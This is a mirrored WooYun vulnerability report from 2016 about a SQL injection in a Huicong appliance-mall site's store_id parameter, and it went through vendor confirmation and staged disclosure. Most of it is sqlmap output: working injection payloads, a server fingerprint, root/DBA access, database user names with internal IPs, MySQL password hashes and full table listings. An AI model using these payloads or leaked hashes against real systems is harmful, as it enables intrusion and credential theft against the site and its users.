乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-24: 细节已通知厂商并且等待厂商处理中 2016-01-25: 厂商已经确认,细节仅向厂商公开 2016-02-04: 细节向核心白帽子及相关领域专家公开 2016-02-14: 细节向普通白帽子公开 2016-02-24: 细节向实习白帽子公开 2016-03-08: 细节向公众公开
慧聪某站点存在SQL注入漏洞,涉及2W+条用户数据
慧聪家电城存在SQL注入漏洞,涉及27033条用户数据漏洞URL:http://www.hcjdc.com/pop_shop.php?act=show_store&store_id=200%27%3B注入点:store_id
sqlmap identified the following injection point(s) with a total of 366 HTTP(s) requests:---Parameter: store_id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: act=show_store&store_id=-6061 OR 1964=1964# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL >= 5.0.0sqlmap resumed the following injection point(s) from stored session:---Parameter: store_id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: act=show_store&store_id=-6061 OR 1964=1964# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5current user: 'root@localhost'current database: 'jdmall'current user is DBA: Truesqlmap resumed the following injection point(s) from stored session:---Parameter: store_id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: act=show_store&store_id=-6061 OR 1964=1964# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5database management system users [11]:[*] ''@'hcjdc'[*] ''@'localhost'[*] 'bj001'@'192.168.50.167'[*] 'bj001'@'192.168.60.%'[*] 'bj001'@'192.168.70.250'[*] 'root'@'127.0.0.1'[*] 'root'@'hcjdc'[*] 'root'@'localhost'[*] 'test2'@'localhost'[*] 'wangheng2'@'%'[*] 'wangheng2'@'58.252.73.135'database management system users password hashes:[*] bj001 [2]: password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F password hash: NULL[*] root [2]: password hash: *68A0D0586406B0933796F17C337E99BB02E07788 password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F[*] test2 [1]: password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA[*] wangheng2 [2]: password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F
数据库和表:
back-end DBMS: MySQL 5Database: hcjdmjcrm[46 tables]+---------------------------------------+| crm_attendplace || crm_contact || crm_contract || crm_contract_attachment || crm_customer || crm_customer_industryissue || crm_customer_offlineactivity || crm_customer_spreadproject || crm_dealrecord || crm_follow || crm_industryissue || crm_invoice || crm_offlineactivity || crm_offlineactivityinviterecord || crm_order || crm_order_details || crm_product || crm_product_category || crm_receive || crm_spreadproject || crm_supplier || crm_supplierdealdetail || hr_department || hr_employee || hr_position || hr_post || param_city || param_sysparam || param_sysparam_type || personal_calendar || personal_notes || public_news || public_notice || sys_app || sys_authority || sys_button || sys_data_authority || sys_info || sys_log || sys_log_err || sys_menu || sys_online || sys_role || sys_role_emp || temp || tool_batch |+---------------------------------------+Database: jdmall[196 tables]+---------------------------------------+| base_appendproperty || base_appendpropertyinstance || base_button || base_file || base_log || base_month || base_notice || base_o_a_setup || base_organization || base_recyclebin || base_roleright || base_roles || base_stafforganize || base_sysloginlog || base_sysmenu || base_usergroup || base_usergroupright || base_userinfo || base_userinfousergroup || base_userright || base_userrole || jd_account_log || jd_ad || jd_ad_custom || jd_ad_position || jd_admin_action || jd_admin_log || jd_admin_message || jd_admin_user || jd_adsense || jd_affiliate_log || jd_agency || jd_area_region || jd_article || jd_article_cat || jd_attribute || jd_auction_log || jd_auto_manage || jd_back_goods || jd_back_order || jd_bonus_log || jd_bonus_price || jd_bonus_type || jd_booking_goods || jd_brand || jd_brand_cat || jd_brand_copy || jd_cancel_goods_log || jd_card || jd_cart || jd_cat_recommend || jd_category || jd_category1 || jd_category2 || jd_check_log || jd_collect_goods || jd_comment || jd_compare_log || jd_crons || jd_delivery_goods || jd_delivery_order || jd_delivery_order_remark || jd_email_list || jd_email_sendlist || jd_entrust || jd_entrust_log || jd_error_log || jd_exchange_goods || jd_favourable_activity || jd_feedback || jd_free_sample || jd_friend_link || jd_goods || jd_goods_activity || jd_goods_article || jd_goods_attr || jd_goods_attr_log || jd_goods_cat || jd_goods_gallery || jd_goods_log || jd_goods_price_log || jd_goods_type || jd_goods_unit || jd_grab_address || jd_grab_area || jd_grab_site_info || jd_group_goods || jd_hc360_category || jd_house_cat || jd_keywords || jd_link_goods || jd_login_log_0 || jd_login_log_1 || jd_login_log_2 || jd_login_log_3 || jd_login_log_4 || jd_login_log_5 || jd_login_log_6 || jd_login_log_7 || jd_login_log_8 || jd_login_log_9 || jd_logistics || jd_mail_templates || jd_member_price || jd_mmt_shop_info || jd_mmt_shop_info_copy || jd_nav || jd_order_action || jd_order_goods || jd_order_info || jd_order_logistics || jd_pack || jd_package_goods || jd_pay_log || jd_payment || jd_plugins || jd_priceoff_activity || jd_priceoff_activity_log || jd_priceoff_goods || jd_products || jd_provider || jd_provider_product || jd_recommend_list || jd_reconciliation || jd_refund_goods || jd_refund_orders || jd_reg_confirm_log || jd_reg_extend_info || jd_reg_fields || jd_reg_sms_log || jd_region || jd_region_bak || jd_retailer_info || jd_role || jd_salesupport_request || jd_salesupport_response || jd_search_log || jd_searchengine || jd_server_edit_log || jd_server_info || jd_server_information || jd_server_logistics || jd_sessions || jd_sessions_data || jd_shield_city || jd_shipping || jd_shipping_area || jd_shop || jd_shop_cat || jd_shop_company_info || jd_shop_company_info_bat || jd_shop_config || jd_sms_extend_user || jd_sms_log || jd_snatch_log || jd_stats || jd_supplier_info || jd_suppliers || jd_tag || jd_template || jd_topic || jd_touch_activity || jd_touch_ad || jd_touch_ad_position || jd_touch_adsense || jd_touch_article || jd_touch_article_cat || jd_touch_auth || jd_touch_brand || jd_touch_category || jd_touch_feedback || jd_touch_goods || jd_touch_goods_activity || jd_touch_nav || jd_touch_payment || jd_touch_shop_config || jd_touch_topic || jd_touch_user_info || jd_user_account || jd_user_address || jd_user_bonus || jd_user_card_info || jd_user_feed || jd_user_key || jd_user_rank || jd_user_white_list || jd_users || jd_users_new || jd_virtual_card || jd_volume_price || jd_volume_price_log || jd_vote || jd_vote_log || jd_vote_option || jd_voucher || jd_wholesale |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: mysql[23 tables]+---------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+---------------------------------------+
用户表数据总共:27033条
过滤
危害等级:中
漏洞Rank:8
确认时间:2016-01-25 10:57
谢谢您。
暂无
